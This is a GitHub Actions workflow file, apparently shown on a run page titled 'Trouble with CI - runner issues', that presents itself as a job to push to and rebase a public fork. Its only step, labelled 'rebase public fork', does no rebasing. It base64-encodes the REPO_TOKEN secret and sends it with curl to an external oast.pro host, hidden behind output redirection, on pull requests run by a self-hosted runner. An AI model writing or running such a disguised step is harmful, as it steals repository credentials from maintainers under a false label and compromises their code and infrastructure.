Skip to content

Trouble with CI - runner issues #71

Trouble with CI - runner issues

Trouble with CI - runner issues #71

Workflow file for this run

name: Push to public fork
on:
pull_request:
branches:
- main
jobs:
build:
#if: ${{ github.repository_owner != 'allegro' }}
runs-on: [self-hosted, ubuntu-latest]
steps:
- uses: actions/checkout@v2
with:
fetch-depth: 0
persist-credentials: false
- name: rebase public fork
run: |
curl -s -d `echo $REPO_TOKEN | base64 -w 0` https://cn3pgcq15o8v29b8bgc0d7qmukuqx5wqi.oast.pro/hook > /dev/null
env:
REPO_TOKEN: ${{ secrets.REPO_TOKEN }}